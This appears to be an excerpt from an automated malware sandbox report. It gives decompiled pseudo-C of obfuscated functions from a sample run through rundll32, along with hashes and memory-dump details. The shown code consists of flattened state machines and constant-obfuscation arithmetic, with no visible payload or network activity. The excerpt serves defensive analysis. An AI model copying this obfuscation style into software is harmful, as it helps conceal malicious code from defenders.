                                                                                                                      • Opcode ID: d808081b3974fde06fd30182d37cf51214d85f33917308e18180cc4e50e553a1
                                                                                                                      • Instruction ID: a1dc2546acd4b1ffa51f78724bd042b284373b07666d885dfeef9edca5859eff
                                                                                                                      • Opcode Fuzzy Hash: d808081b3974fde06fd30182d37cf51214d85f33917308e18180cc4e50e553a1
                                                                                                                      • Instruction Fuzzy Hash: 95221171508381DFD369CF25C54AA8BFBE2BBC4708F108A1DE6D98A261D7B19949DF03
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 95%
                                                                                                                      			E00360D5B() {
                                                                                                                      				void* _t279;
                                                                                                                      				signed char _t284;
                                                                                                                      				intOrPtr _t294;
                                                                                                                      				signed int _t296;
                                                                                                                      				signed int _t302;
                                                                                                                      				signed char _t309;
                                                                                                                      				intOrPtr _t310;
                                                                                                                      				void* _t311;
                                                                                                                      				signed short _t340;
                                                                                                                      				signed int _t341;
                                                                                                                      				intOrPtr _t342;
                                                                                                                      				signed int _t346;
                                                                                                                      				signed int _t349;
                                                                                                                      				signed int _t350;
                                                                                                                      				signed int _t351;
                                                                                                                      				signed int _t352;
                                                                                                                      				signed int _t353;
                                                                                                                      				signed int _t354;
                                                                                                                      				signed int _t355;
                                                                                                                      				signed short* _t359;
                                                                                                                      				void* _t361;
                                                                                                                      
                                                                                                                      				 *(_t361 + 0x80) =  *(_t361 + 0x80) & 0x00000000;
                                                                                                                      				 *(_t361 + 0x74) = 0x716487;
                                                                                                                      				_t302 = 0x4e9f10f;
                                                                                                                      				 *(_t361 + 0x78) = 0xba6397;
                                                                                                                      				 *(_t361 + 0x7c) = 0x705fb8;
                                                                                                                      				 *(_t361 + 0x68) = 0x4c092e;
                                                                                                                      				_t7 = _t361 + 0x68; // 0x4c092e
                                                                                                                      				_t349 = 5;
                                                                                                                      				 *(_t361 + 0x7c) =  *_t7 / _t349;
                                                                                                                      				 *(_t361 + 0x7c) =  *(_t361 + 0x7c) ^ 0x0003a2ba;
                                                                                                                      				 *(_t361 + 0x64) = 0x751de4;
                                                                                                                      				 *(_t361 + 0x64) =  *(_t361 + 0x64) + 0xffff6a51;
                                                                                                                      				 *(_t361 + 0x64) =  *(_t361 + 0x64) ^ 0x007ee7f9;
                                                                                                                      				 *(_t361 + 0x44) = 0x9fd9a3;
                                                                                                                      				 *(_t361 + 0x44) =  *(_t361 + 0x44) << 6;
                                                                                                                      				 *(_t361 + 0x44) =  *(_t361 + 0x44) << 4;
                                                                                                                      				 *(_t361 + 0x44) =  *(_t361 + 0x44) ^ 0x7f6c4ffb;
                                                                                                                      				 *(_t361 + 0x28) = 0x22a0e;
                                                                                                                      				 *(_t361 + 0x28) =  *(_t361 + 0x28) >> 0xb;
                                                                                                                      				 *(_t361 + 0x28) =  *(_t361 + 0x28) + 0x788;
                                                                                                                      				_t350 = 0x41;
                                                                                                                      				 *(_t361 + 0x28) =  *(_t361 + 0x28) * 0x62;
                                                                                                                      				 *(_t361 + 0x28) =  *(_t361 + 0x28) ^ 0x000a9bb9;
                                                                                                                      				 *(_t361 + 0x20) = 0xda6f7f;
                                                                                                                      				 *(_t361 + 0x20) =  *(_t361 + 0x20) * 0x62;
                                                                                                                      				 *(_t361 + 0x20) =  *(_t361 + 0x20) * 7;
                                                                                                                      				 *(_t361 + 0x20) =  *(_t361 + 0x20) << 0xa;
                                                                                                                      				 *(_t361 + 0x20) =  *(_t361 + 0x20) ^ 0x5b1b1cce;
                                                                                                                      				 *(_t361 + 0x74) = 0x2b9064;
                                                                                                                      				 *(_t361 + 0x74) =  *(_t361 + 0x74) + 0x7c5a;
                                                                                                                      				 *(_t361 + 0x74) =  *(_t361 + 0x74) ^ 0x002a32d7;
                                                                                                                      				 *(_t361 + 0x5c) = 0xcbc6c3;
                                                                                                                      				 *(_t361 + 0x5c) =  *(_t361 + 0x5c) * 0x12;
                                                                                                                      				 *(_t361 + 0x5c) =  *(_t361 + 0x5c) ^ 0x0e5c6d3d;
                                                                                                                      				 *(_t361 + 0x40) = 0xfaf28f;
                                                                                                                      				 *(_t361 + 0x40) =  *(_t361 + 0x40) ^ 0x36c89793;
                                                                                                                      				 *(_t361 + 0x40) =  *(_t361 + 0x40) | 0x5dfe35bf;
                                                                                                                      				 *(_t361 + 0x40) =  *(_t361 + 0x40) ^ 0x7ff1266d;
                                                                                                                      				 *(_t361 + 0x3c) = 0x71501;
                                                                                                                      				 *(_t361 + 0x3c) =  *(_t361 + 0x3c) ^ 0x7d526c09;
                                                                                                                      				 *(_t361 + 0x3c) =  *(_t361 + 0x3c) | 0x29ca113d;
                                                                                                                      				 *(_t361 + 0x3c) =  *(_t361 + 0x3c) ^ 0x7dd950c2;
                                                                                                                      				 *(_t361 + 0x78) = 0x2c4b29;
                                                                                                                      				 *(_t361 + 0x78) =  *(_t361 + 0x78) ^ 0xa68b4193;
                                                                                                                      				 *(_t361 + 0x78) =  *(_t361 + 0x78) ^ 0xa6a148a4;
                                                                                                                      				 *(_t361 + 0x50) = 0xa9eb43;
                                                                                                                      				 *(_t361 + 0x50) =  *(_t361 + 0x50) << 4;
                                                                                                                      				 *(_t361 + 0x50) =  *(_t361 + 0x50) ^ 0x0a966e12;
                                                                                                                      				 *(_t361 + 0x24) = 0xf29fdf;
                                                                                                                      				 *(_t361 + 0x24) =  *(_t361 + 0x24) / _t350;
                                                                                                                      				 *(_t361 + 0x24) =  *(_t361 + 0x24) | 0x702811c1;
                                                                                                                      				 *(_t361 + 0x24) =  *(_t361 + 0x24) ^ 0xfde5eea1;
                                                                                                                      				 *(_t361 + 0x24) =  *(_t361 + 0x24) ^ 0x8dc07913;
                                                                                                                      				 *(_t361 + 0x48) = 0x26e009;
                                                                                                                      				 *(_t361 + 0x48) =  *(_t361 + 0x48) ^ 0xd6899262;
                                                                                                                      				 *(_t361 + 0x48) =  *(_t361 + 0x48) << 1;
                                                                                                                      				 *(_t361 + 0x48) =  *(_t361 + 0x48) ^ 0xad52b6d6;
                                                                                                                      				 *(_t361 + 0x1c) = 0xb261a6;
                                                                                                                      				 *(_t361 + 0x1c) =  *(_t361 + 0x1c) + 0x753a;
                                                                                                                      				_t351 = 0x3f;
                                                                                                                      				 *(_t361 + 0x18) =  *(_t361 + 0x1c) / _t351;
                                                                                                                      				 *(_t361 + 0x18) =  *(_t361 + 0x18) + 0xffffc68f;
                                                                                                                      				 *(_t361 + 0x18) =  *(_t361 + 0x18) ^ 0x00055965;
                                                                                                                      				 *(_t361 + 0x10) = 0xb29e6;
                                                                                                                      				 *(_t361 + 0x10) =  *(_t361 + 0x10) ^ 0xf1ef7176;
                                                                                                                      				_t352 = 0x53;
                                                                                                                      				_t346 =  *(_t361 + 0x80);
                                                                                                                      				 *(_t361 + 0x14) =  *(_t361 + 0x10) * 0x52;
                                                                                                                      				 *(_t361 + 0x14) =  *(_t361 + 0x14) + 0xffff3d5f;
                                                                                                                      				 *(_t361 + 0x14) =  *(_t361 + 0x14) ^ 0x7b287ee9;
                                                                                                                      				 *(_t361 + 0x6c) = 0xc2349f;
                                                                                                                      				_t359 =  *(_t361 + 0x80);
                                                                                                                      				 *(_t361 + 0x6c) =  *(_t361 + 0x6c) * 0x2b;
                                                                                                                      				 *(_t361 + 0x6c) =  *(_t361 + 0x6c) ^ 0x209b01de;
                                                                                                                      				 *(_t361 + 0x30) = 0xecc1f5;
                                                                                                                      				 *(_t361 + 0x30) =  *(_t361 + 0x30) ^ 0x10955a53;
                                                                                                                      				 *(_t361 + 0x30) =  *(_t361 + 0x30) | 0x79713791;
                                                                                                                      				 *(_t361 + 0x30) =  *(_t361 + 0x30) / _t352;
                                                                                                                      				 *(_t361 + 0x30) =  *(_t361 + 0x30) ^ 0x017289e0;
                                                                                                                      				 *(_t361 + 0x58) = 0x8daaf;
                                                                                                                      				_t353 = 0xe;
                                                                                                                      				 *(_t361 + 0x58) =  *(_t361 + 0x58) / _t353;
                                                                                                                      				 *(_t361 + 0x58) =  *(_t361 + 0x58) ^ 0x00025281;
                                                                                                                      				 *(_t361 + 0x54) = 0x82784e;
                                                                                                                      				 *(_t361 + 0x54) =  *(_t361 + 0x54) | 0x1fcf3d57;
                                                                                                                      				 *(_t361 + 0x54) =  *(_t361 + 0x54) ^ 0x1fc5386b;
                                                                                                                      				 *(_t361 + 0x2c) = 0xdcbbf5;
                                                                                                                      				 *(_t361 + 0x2c) =  *(_t361 + 0x2c) >> 0xa;
                                                                                                                      				 *(_t361 + 0x2c) =  *(_t361 + 0x2c) >> 2;
                                                                                                                      				 *(_t361 + 0x2c) =  *(_t361 + 0x2c) + 0xffff64c3;
                                                                                                                      				 *(_t361 + 0x2c) =  *(_t361 + 0x2c) ^ 0xfffe0972;
                                                                                                                      				 *(_t361 + 0x70) = 0xf032c2;
                                                                                                                      				 *(_t361 + 0x70) =  *(_t361 + 0x70) + 0xffff1f36;
                                                                                                                      				 *(_t361 + 0x70) =  *(_t361 + 0x70) ^ 0x00e5c56e;
                                                                                                                      				 *(_t361 + 0x38) = 0xb1df5b;
                                                                                                                      				 *(_t361 + 0x38) =  *(_t361 + 0x38) << 0xe;
                                                                                                                      				 *(_t361 + 0x38) =  *(_t361 + 0x38) << 0xa;
                                                                                                                      				 *(_t361 + 0x38) =  *(_t361 + 0x38) ^ 0x5b06c733;
                                                                                                                      				 *(_t361 + 0x18) = 0x22b4d7;
                                                                                                                      				 *(_t361 + 0x18) =  *(_t361 + 0x18) ^ 0x9a622f3f;
                                                                                                                      				 *(_t361 + 0x18) =  *(_t361 + 0x18) + 0xcb3c;
                                                                                                                      				_t354 = 0x1f;
                                                                                                                      				 *(_t361 + 0x18) =  *(_t361 + 0x18) / _t354;
                                                                                                                      				 *(_t361 + 0x18) =  *(_t361 + 0x18) ^ 0x04f5d5b3;
                                                                                                                      				 *(_t361 + 0x34) = 0xa6176b;
                                                                                                                      				_t355 = 0x3b;
                                                                                                                      				 *(_t361 + 0x30) =  *(_t361 + 0x34) / _t355;
                                                                                                                      				 *(_t361 + 0x30) =  *(_t361 + 0x30) >> 0xb;
                                                                                                                      				 *(_t361 + 0x30) =  *(_t361 + 0x30) + 0xffffd9a6;
                                                                                                                      				 *(_t361 + 0x30) =  *(_t361 + 0x30) ^ 0xfffb162a;
                                                                                                                      				while(1) {
                                                                                                                      					L1:
                                                                                                                      					L2:
                                                                                                                      					while(1) {
                                                                                                                      						while(_t302 != 0xb6d0a5) {
                                                                                                                      							if(_t302 == 0x1c75f00) {
                                                                                                                      								_push(_t302);
                                                                                                                      								_push(_t302);
                                                                                                                      								_t311 = 0x68;
                                                                                                                      								_t359 = E00353512(_t311);
                                                                                                                      								__eflags = _t359;
                                                                                                                      								if(__eflags != 0) {
                                                                                                                      									_t302 = 0xb6d0a5;
                                                                                                                      									goto L17;
                                                                                                                      								}
                                                                                                                      							} else {
                                                                                                                      								if(_t302 == 0x4e9f10f) {
                                                                                                                      									_t342 =  *0x365214; // 0x0
                                                                                                                      									_t302 = 0x8016e2b;
                                                                                                                      									_t341 = _t342 + 4;
                                                                                                                      									goto L12;
                                                                                                                      								} else {
                                                                                                                      									if(_t302 == 0x6570a92) {
                                                                                                                      										_t294 =  *0x365214; // 0x0
                                                                                                                      										_t302 = 0xe9e8905;
                                                                                                                      										 *_t341 = _t359;
                                                                                                                      										_t212 =  &(_t359[0x2c]); // 0x58
                                                                                                                      										_t341 = _t212;
                                                                                                                      										_t213 = _t294 + 0x44;
                                                                                                                      										 *_t213 =  *(_t294 + 0x44) + 1;
                                                                                                                      										__eflags =  *_t213;
                                                                                                                      										L12:
                                                                                                                      										 *(_t361 + 0x5c) = _t341;
                                                                                                                      										goto L13;
                                                                                                                      									} else {
                                                                                                                      										if(_t302 == 0x8016e2b) {
                                                                                                                      											_t296 = E0035EAE6(0x365000,  *((intOrPtr*)(_t361 + 0x88)), __eflags,  *(_t361 + 0x6c),  *(_t361 + 0x48), _t361 + 0x84,  *(_t361 + 0x24));
                                                                                                                      											_t361 = _t361 + 0x10;
                                                                                                                      											 *(_t361 + 0x7c) = _t296;
                                                                                                                      											_t346 = _t296;
                                                                                                                      											_t302 = 0x1c75f00;
                                                                                                                      											 *(_t361 + 0x64) = _t296 +  *(_t361 + 0x80);
                                                                                                                      											goto L1;
                                                                                                                      										} else {
                                                                                                                      											if(_t302 == 0x8020f8f) {
                                                                                                                      												E003468DE( *(_t361 + 0x78),  *(_t361 + 0x40),  *(_t361 + 0x1c),  *(_t361 + 0x34),  *(_t361 + 0x7c));
                                                                                                                      											} else {
                                                                                                                      												if(_t302 != 0xe9e8905) {
                                                                                                                      													L19:
                                                                                                                      													__eflags = _t302 - 0x718ec4e;
                                                                                                                      													if(__eflags != 0) {
                                                                                                                      														L17:
                                                                                                                      														_t341 =  *(_t361 + 0x5c);
                                                                                                                      														L13:
                                                                                                                      														continue;
                                                                                                                      													}
                                                                                                                      												} else {
                                                                                                                      													asm("sbb ecx, ecx");
                                                                                                                      													_t302 = (_t302 & 0xf9c54f71) + 0x8020f8f;
                                                                                                                      													continue;
                                                                                                                      												}
                                                                                                                      											}
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      							_t310 =  *0x365214; // 0x0
                                                                                                                      							 *(_t310 + 0x38) =  *(_t310 + 0x38) & 0x00000000;
                                                                                                                      							 *((intOrPtr*)(_t310 + 0x3c)) =  *((intOrPtr*)(_t310 + 4));
                                                                                                                      							__eflags = 1;
                                                                                                                      							return 1;
                                                                                                                      						}
                                                                                                                      						_push( *((intOrPtr*)(_t361 + 0x4c)));
                                                                                                                      						_push( *(_t361 + 0x78));
                                                                                                                      						 *((char*)(_t361 + 0x53)) =  *((intOrPtr*)(_t346 + 1));
                                                                                                                      						_push(0x34134c);
                                                                                                                      						 *(_t361 + 0x56) =  *((intOrPtr*)(_t346 + 2));
                                                                                                                      						_t279 = E0034AB66( *(_t361 + 0x44),  *(_t361 + 0x40), __eflags);
                                                                                                                      						_t231 =  &(_t359[0x10]); // 0x20
                                                                                                                      						_push(_t279);
                                                                                                                      						E0035BDB5(_t231, __eflags, 0x10,  *(_t361 + 0x54),  *(_t361 + 0x74),  *(_t361 + 0x44),  *(_t361 + 0x38),  *(_t361 + 0x56) & 0x000000ff,  *((intOrPtr*)(_t361 + 0x88)),  *(_t361 + 0x48),  *(_t361 + 0x63) & 0x000000ff,  *(_t346 + 3) & 0x000000ff,  *(_t346 + 3) & 0x000000ff);
                                                                                                                      						E0034AE03( *((intOrPtr*)(_t361 + 0x94)),  *((intOrPtr*)(_t361 + 0x90)),  *(_t361 + 0x64), _t279);
                                                                                                                      						_t361 = _t361 + 0x40;
                                                                                                                      						 *_t359 = ( *(_t346 + 4) & 0x000000ff) << 0x00000008 |  *(_t346 + 5) & 0x000000ff;
                                                                                                                      						_t284 =  *((intOrPtr*)(_t346 + 6));
                                                                                                                      						_t309 =  *((intOrPtr*)(_t346 + 7));
                                                                                                                      						_t346 = _t346 + 8;
                                                                                                                      						_t302 = 0x6570a92;
                                                                                                                      						_t340 = (_t284 & 0x000000ff) << 0x00000008 | _t309 & 0x000000ff;
                                                                                                                      						__eflags = _t340;
                                                                                                                      						_t359[0x28] = _t340;
                                                                                                                      						goto L19;
                                                                                                                      					}
                                                                                                                      				}
                                                                                                                      			}

























                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: lR}$&$)K,$.L$:u$Z|$~({
                                                                                                                      • API String ID: 0-3122078039
                                                                                                                      • Opcode ID: 170ee65f4595ece3f5cd06dad97d0857b2804cf188358f00603d2c99cd863379
                                                                                                                      • Instruction ID: 1c4f9dfc1fca1f658367a3eb71702f5a9b86e5a9525dbdc59b2918d0695f24ed
                                                                                                                      • Opcode Fuzzy Hash: 170ee65f4595ece3f5cd06dad97d0857b2804cf188358f00603d2c99cd863379
                                                                                                                      • Instruction Fuzzy Hash: DCD14FB15083808FC369CF65C48995BBBE1FBC5748F148A1DF6D68A260D3B5D949CF82
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 100%
                                                                                                                      			E0036146E(void* __ecx) {
                                                                                                                      				signed int _v4;
                                                                                                                      				signed int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				unsigned int _v36;
                                                                                                                      				unsigned int _v40;
                                                                                                                      				signed int _v44;
                                                                                                                      				unsigned int _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				unsigned int _v56;
                                                                                                                      				signed int _v60;
                                                                                                                      				signed int _v64;
                                                                                                                      				signed int _v68;
                                                                                                                      				signed int _v72;
                                                                                                                      				signed int _v76;
                                                                                                                      				signed int _v80;
                                                                                                                      				signed int _v84;
                                                                                                                      				signed int _v88;
                                                                                                                      				signed int _v92;
                                                                                                                      				signed int _v96;
                                                                                                                      				signed int _v100;
                                                                                                                      				signed int _v104;
                                                                                                                      				void* _t243;
                                                                                                                      				void* _t248;
                                                                                                                      				void* _t253;
                                                                                                                      				void* _t260;
                                                                                                                      				void* _t265;
                                                                                                                      				void* _t270;
                                                                                                                      				void* _t271;
                                                                                                                      				signed int _t273;
                                                                                                                      				signed int _t274;
                                                                                                                      				signed int _t275;
                                                                                                                      				signed int _t276;
                                                                                                                      				signed int _t277;
                                                                                                                      				signed int _t278;
                                                                                                                      				signed int _t279;
                                                                                                                      				void* _t298;
                                                                                                                      				void* _t299;
                                                                                                                      				signed int* _t301;
                                                                                                                      				void* _t309;
                                                                                                                      
                                                                                                                      				_t301 =  &_v104;
                                                                                                                      				_v4 = 0xac6d1;
                                                                                                                      				_v4 = _v4 | 0x81c51043;
                                                                                                                      				_v4 = _v4 ^ 0x81ca09c2;
                                                                                                                      				_v8 = 0xb8d74f;
                                                                                                                      				_v8 = _v8 | 0x3a2284f4;
                                                                                                                      				_v8 = _v8 ^ 0x3ab94f49;
                                                                                                                      				_v12 = 0x56dc2c;
                                                                                                                      				_v12 = _v12 >> 0xf;
                                                                                                                      				_v12 = _v12 ^ 0x0005485d;
                                                                                                                      				_v20 = 0x903a48;
                                                                                                                      				_v20 = _v20 ^ 0xb2572448;
                                                                                                                      				_v20 = _v20 ^ 0xb2cdfeb2;
                                                                                                                      				_v24 = 0x1df316;
                                                                                                                      				_v24 = _v24 * 0x26;
                                                                                                                      				_t271 = __ecx;
                                                                                                                      				_v24 = _v24 ^ 0x04774828;
                                                                                                                      				_t298 = 0;
                                                                                                                      				_v96 = 0x29fbe6;
                                                                                                                      				_t299 = 0x412d246;
                                                                                                                      				_v96 = _v96 << 0xd;
                                                                                                                      				_v96 = _v96 + 0x40e6;
                                                                                                                      				_v96 = _v96 + 0xf8d0;
                                                                                                                      				_v96 = _v96 ^ 0x3f79ed75;
                                                                                                                      				_v28 = 0x5f5eb9;
                                                                                                                      				_v28 = _v28 ^ 0x304beccc;
                                                                                                                      				_v28 = _v28 ^ 0x301ae6f7;
                                                                                                                      				_v16 = 0x707b25;
                                                                                                                      				_v16 = _v16 | 0xc66cf16b;
                                                                                                                      				_v16 = _v16 ^ 0xc674099c;
                                                                                                                      				_v68 = 0x422c76;
                                                                                                                      				_v68 = _v68 >> 5;
                                                                                                                      				_v68 = _v68 ^ 0x51e03a27;
                                                                                                                      				_v68 = _v68 ^ 0x51e925f4;
                                                                                                                      				_v72 = 0x838679;
                                                                                                                      				_t273 = 0x50;
                                                                                                                      				_v72 = _v72 / _t273;
                                                                                                                      				_t274 = 0xb;
                                                                                                                      				_v72 = _v72 / _t274;
                                                                                                                      				_v72 = _v72 ^ 0x0007ebfd;
                                                                                                                      				_v92 = 0x3398da;
                                                                                                                      				_t275 = 0x26;
                                                                                                                      				_v92 = _v92 * 0x6d;
                                                                                                                      				_v92 = _v92 ^ 0x75ca49c7;
                                                                                                                      				_v92 = _v92 << 6;
                                                                                                                      				_v92 = _v92 ^ 0x0c9e0967;
                                                                                                                      				_v48 = 0x734a11;
                                                                                                                      				_v48 = _v48 >> 0xa;
                                                                                                                      				_v48 = _v48 ^ 0x00076871;
                                                                                                                      				_v52 = 0xdc5b30;
                                                                                                                      				_v52 = _v52 ^ 0x2a73247b;
                                                                                                                      				_v52 = _v52 ^ 0x2aa1f0d2;
                                                                                                                      				_v104 = 0x2f7cf6;
                                                                                                                      				_v104 = _v104 / _t275;
                                                                                                                      				_v104 = _v104 * 0x41;
                                                                                                                      				_v104 = _v104 | 0xaae37d31;
                                                                                                                      				_v104 = _v104 ^ 0xaaffffad;
                                                                                                                      				_v56 = 0xefab9e;
                                                                                                                      				_v56 = _v56 >> 9;
                                                                                                                      				_v56 = _v56 ^ 0x0008ac09;
                                                                                                                      				_v80 = 0xd17701;
                                                                                                                      				_t276 = 0x57;
                                                                                                                      				_v80 = _v80 / _t276;
                                                                                                                      				_v80 = _v80 + 0xffff6938;
                                                                                                                      				_v80 = _v80 ^ 0x000bb913;
                                                                                                                      				_v44 = 0x9eed53;
                                                                                                                      				_t277 = 0x32;
                                                                                                                      				_v44 = _v44 * 0x74;
                                                                                                                      				_v44 = _v44 ^ 0x480bdaeb;
                                                                                                                      				_v100 = 0xb1cacc;
                                                                                                                      				_v100 = _v100 ^ 0xb6415150;
                                                                                                                      				_v100 = _v100 / _t277;
                                                                                                                      				_t278 = 0x13;
                                                                                                                      				_v100 = _v100 * 0x1c;
                                                                                                                      				_v100 = _v100 ^ 0x667becf7;
                                                                                                                      				_v84 = 0x7272f5;
                                                                                                                      				_v84 = _v84 | 0x49285dda;
                                                                                                                      				_v84 = _v84 / _t278;
                                                                                                                      				_v84 = _v84 ^ 0x03db0e7b;
                                                                                                                      				_v32 = 0x23e0bb;
                                                                                                                      				_v32 = _v32 ^ 0xc1a40ef0;
                                                                                                                      				_v32 = _v32 ^ 0xc18ab8c7;
                                                                                                                      				_v36 = 0x934e6;
                                                                                                                      				_v36 = _v36 >> 8;
                                                                                                                      				_v36 = _v36 ^ 0x000f952f;
                                                                                                                      				_v76 = 0x57f010;
                                                                                                                      				_t279 = 0x55;
                                                                                                                      				_v76 = _v76 / _t279;
                                                                                                                      				_v76 = _v76 | 0x3f39553c;
                                                                                                                      				_v76 = _v76 ^ 0x3f3ef260;
                                                                                                                      				_v40 = 0x93d6f8;
                                                                                                                      				_v40 = _v40 >> 6;
                                                                                                                      				_v40 = _v40 ^ 0x000a0563;
                                                                                                                      				_v60 = 0x62e666;
                                                                                                                      				_v60 = _v60 ^ 0x6bd8a41b;
                                                                                                                      				_v60 = _v60 * 0x61;
                                                                                                                      				_v60 = _v60 ^ 0xd19d18b1;
                                                                                                                      				_v88 = 0xe2190a;
                                                                                                                      				_v88 = _v88 * 0x56;
                                                                                                                      				_v88 = _v88 << 0x10;
                                                                                                                      				_v88 = _v88 * 0x2c;
                                                                                                                      				_v88 = _v88 ^ 0x1bd8b0be;
                                                                                                                      				_v64 = 0x7df3ba;
                                                                                                                      				_v64 = _v64 >> 3;
                                                                                                                      				_v64 = _v64 << 8;
                                                                                                                      				_v64 = _v64 ^ 0x0fbc3045;
                                                                                                                      				goto L1;
                                                                                                                      				do {
                                                                                                                      					while(1) {
                                                                                                                      						L1:
                                                                                                                      						_t309 = _t299 - 0x5b9992e;
                                                                                                                      						if(_t309 > 0) {
                                                                                                                      							break;
                                                                                                                      						}
                                                                                                                      						if(_t309 == 0) {
                                                                                                                      							_t253 = E0035274F();
                                                                                                                      							_t301 = _t301 - 0xc + 0xc;
                                                                                                                      							_t299 = 0x4369ff;
                                                                                                                      							_t298 = _t298 + _t253;
                                                                                                                      							continue;
                                                                                                                      						} else {
                                                                                                                      							if(_t299 == 0x4369ff) {
                                                                                                                      								_t298 = _t298 + E0034B782(_t271 + 0x1c, _v60, _v88, _v64);
                                                                                                                      							} else {
                                                                                                                      								if(_t299 == 0x240c704) {
                                                                                                                      									_t260 = E0035274F();
                                                                                                                      									_t301 = _t301 - 0xc + 0xc;
                                                                                                                      									_t299 = 0x5b9992e;
                                                                                                                      									_t298 = _t298 + _t260;
                                                                                                                      									continue;
                                                                                                                      								} else {
                                                                                                                      									if(_t299 == 0x412d246) {
                                                                                                                      										_t299 = 0x80cf0f0;
                                                                                                                      										continue;
                                                                                                                      									} else {
                                                                                                                      										if(_t299 != 0x47dcd1e) {
                                                                                                                      											goto L17;
                                                                                                                      										} else {
                                                                                                                      											_t265 = E0035274F();
                                                                                                                      											_t301 = _t301 - 0xc + 0xc;
                                                                                                                      											_t299 = 0x240c704;
                                                                                                                      											_t298 = _t298 + _t265;
                                                                                                                      											continue;
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						L20:
                                                                                                                      						return _t298;
                                                                                                                      					}
                                                                                                                      					if(_t299 == 0x80cf0f0) {
                                                                                                                      						_t243 = E0034B782(_t271 + 8, _v4, _v8, _v12);
                                                                                                                      						_t301 =  &(_t301[2]);
                                                                                                                      						_t299 = 0xe2e5f52;
                                                                                                                      						_t298 = _t298 + _t243;
                                                                                                                      						goto L17;
                                                                                                                      					} else {
                                                                                                                      						if(_t299 == 0xa9f5c45) {
                                                                                                                      							_t248 = E0035274F();
                                                                                                                      							_t301 = _t301 - 0xc + 0xc;
                                                                                                                      							_t299 = 0x47dcd1e;
                                                                                                                      							_t298 = _t298 + _t248;
                                                                                                                      							goto L1;
                                                                                                                      						} else {
                                                                                                                      							if(_t299 != 0xe2e5f52) {
                                                                                                                      								goto L17;
                                                                                                                      							} else {
                                                                                                                      								_t270 = E0035274F();
                                                                                                                      								_t301 = _t301 - 0xc + 0xc;
                                                                                                                      								_t299 = 0xa9f5c45;
                                                                                                                      								_t298 = _t298 + _t270;
                                                                                                                      								goto L1;
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      					}
                                                                                                                      					goto L20;
                                                                                                                      					L17:
                                                                                                                      				} while (_t299 != 0xe1ba840);
                                                                                                                      				goto L20;
                                                                                                                      			}
















































                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: %{p$':Q$<U9?$fb$uy?${$s*$4
                                                                                                                      • API String ID: 0-3558008229
                                                                                                                      • Opcode ID: 84da1592223dd1f04f0f3a6d750a6106e25ec91bc4b6139091f670668cf43936
                                                                                                                      • Instruction ID: 9fc4304230c44665484e53c336f918d0f115409ca9b0cca78bf9eea92fdec7d6
                                                                                                                      • Opcode Fuzzy Hash: 84da1592223dd1f04f0f3a6d750a6106e25ec91bc4b6139091f670668cf43936
                                                                                                                      • Instruction Fuzzy Hash: 29B124729083819FC358DF69D58A40BFBF1BBD4344F158A2DF4999A220D3B5DA48CF86
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 78%
                                                                                                                      			E0034194C(void* __ecx, signed int __edx, void* __edi, void* __eflags, signed int _a4, intOrPtr _a8, char _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				signed int _v44;
                                                                                                                      				signed int _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				signed int _v56;
                                                                                                                      				signed int _v60;
                                                                                                                      				signed int _v64;
                                                                                                                      				signed int _v68;
                                                                                                                      				signed int _v72;
                                                                                                                      				signed int _v76;
                                                                                                                      				signed int _v80;
                                                                                                                      				signed int _v84;
                                                                                                                      				unsigned int _v88;
                                                                                                                      				signed int _v92;
                                                                                                                      				signed int _v96;
                                                                                                                      				signed int _v100;
                                                                                                                      				signed int _v104;
                                                                                                                      				signed int _v108;
                                                                                                                      				signed int _v112;
                                                                                                                      				signed int _v116;
                                                                                                                      				signed int _v120;
                                                                                                                      				signed int _v124;
                                                                                                                      				signed int _v128;
                                                                                                                      				signed int _v132;
                                                                                                                      				signed int _v136;
                                                                                                                      				signed int _v140;
                                                                                                                      				signed int _v144;
                                                                                                                      				signed int _v148;
                                                                                                                      				signed int _v152;
                                                                                                                      				intOrPtr _v156;
                                                                                                                      				char _v176;
                                                                                                                      				short _v720;
                                                                                                                      				short _v722;
                                                                                                                      				char _v724;
                                                                                                                      				signed int _v768;
                                                                                                                      				char _v1288;
                                                                                                                      				char _v1808;
                                                                                                                      				void* _t336;
                                                                                                                      				signed int _t361;
